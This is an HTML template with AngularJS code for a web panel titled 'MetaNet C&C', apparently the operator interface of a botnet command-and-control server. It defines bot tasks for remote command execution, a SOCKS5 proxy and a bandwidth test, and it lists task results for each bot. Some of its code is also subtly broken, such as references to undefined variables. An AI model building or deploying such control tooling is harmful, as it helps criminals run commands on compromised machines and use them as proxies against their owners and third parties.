<!DOCTYPE html>
<html ng-app="resultsApp">
<head>
    <title>MetaNet C&C - Task results</title>
    <link href="static/dialogs.min.css" rel="stylesheet" type="text/css"/>
    <script src="static/jquery-2.1.4.min.js"></script>
    <script type="text/javascript" src="static/socket.io-1.3.7.min.js"></script>

    <link href="static/bootstrap.min.css" rel="stylesheet" type="text/css"/>
    <link href="static/results.css" rel="stylesheet" type="text/css"/>
    <script src="static/angular-1.5.0-rc.0.min.js"
            type="text/javascript"></script>
    <script src="static/angular-sanitize.min.js"
            type="text/javascript"></script>
    <script src="static/dialogs.min.js"
            type="text/javascript"></script>
    <script src="static/angular-animate.min.js" type="text/javascript"></script>
    <script src="static/ng-contextmenu.min.js" type="text/javascript"></script>
    <link href="static/menu/menu.css" rel="stylesheet" type="text/css"/>

    <script src="static/ui-bootstrap-tpls-0.14.3.min.js" type="text/javascript"></script>
    <script type="text/javascript" charset="utf-8">
        'use strict;'
        var app = angular.module('resultsApp', ['ui.bootstrap', 'ngAnimate', 'ngContextMenu', 'dialogs.main']);

        app.controller('notifyDialog', function ($scope, $uibModalInstance, data) {
            $scope.data = data;
            $scope.done = function () {
                $uibModalInstance.close();
            };
            $scope.hitEnter = function () {
                $uibModalInstance.close();
            };
        });

        app.controller('resultsController', function ($scope, $http, $timeout, dialogs) {
            $scope.tasks = [
                {'id': 1, 'name': 'Execute CMD', "img": "sand3.png", "parameters": ["CMD"]},
                {'id': 2, 'name': 'SOCKS5', "img": "bird30.png", "parameters": ["Port"]},
                {
                    'id': 3,
                    'name': 'Bandwidth test',
                    "img": "bird30.png",
                    "parameters": ["Download link", "Parallel connections"]
                }
            ];
            $scope.getTaskNameFromID = function (task_id) {
                return tasks[task_id].name;
            };
            $scope.isCollapsed = true;
            $scope.modelData = {};
            $scope.modelData.reverseSort = false;
            $scope.headers = {"id": "id", "bot_id": "bot_id", "task": "task", "date": "date"};
            $http.get("../ajax/results/" + "0").success(function (response) {
                $scope.results = response;
            });
            $scope.launch = function (which, data) {
                //console.log(task);
                switch (which) {
                    case 'error':
                        dialogs.error();
                        break;
                    case 'wait':
                        var dlg = dialogs.wait(undefined, undefined, _progress);
                        _fakeWaitProgress();
                        break;
                    case 'notify':
                        dialogs.notify();
                        break;
                    case 'confirm':
                        var dlg = dialogs.confirm();
                        dlg.result.then(function (btn) {
                            $scope.confirmed = 'You confirmed "Yes."';
                        }, function (btn) {
                            $scope.confirmed = 'You confirmed "No."';
                        });
                        break;
                    case 'notifyDialog':
                        var dlg = dialogs.create('static/dialogs/notify.html', 'notifyDialog', data.replace("\\n", "<br>"), {
                            size: 'lg',
                            keyboard: true,
                            backdrop: false,
                            windowClass: 'my-class'
                        });
                        //dlg.result.then(function (params) {});
                        break;

                }
            };
        });
    </script>
</head>
<body>
{% block body %}
{% include 'menu.html' %}
<div ng-controller="resultsController">
    <div class="container">
        <div class="bs-docs-section clearfix">
            <div class="row">
                <div class="col-lg-12">
                    <table id="tasks" class="table table-striped row-border hover col-lg-12">
                        <thead>
                        <tr>
                            <th ng-repeat="(key,value) in headers"
                                ng-click="modelData.orderByField=value; modelData.reverseSort = !modelData.reverseSort">
                                {{key |angular}}
                    <span ng-show="modelData.orderByField == value">
                        <span ng-show="!modelData.reverseSort"> &#9662</span>
                        <span ng-show="modelData.reverseSort"> &#9652</span>
                    </span>
                            </th>
                        </tr>
                        </thead>
                        <tbody>
                        <tr ng-click="launch('notifyDialog',task.result)" data-context-event="contextmenu"
                            data-context-menu="static/menu/menu.html"
                            ng-repeat="task in results">

                            <td>{{task.id |angular}}</td>
                            <td>{{task.bot_id |angular}}</td>
                            <td>{{"tasks[task.task].name" |angular}}</td>
                            <td>{{task.timestamp |angular}}</td>
                        </tr>
                        </tbody>
                    </table>
                </div>
            </div>
        </div>
    </div>
</div>
{% endblock %}
</body>
</html>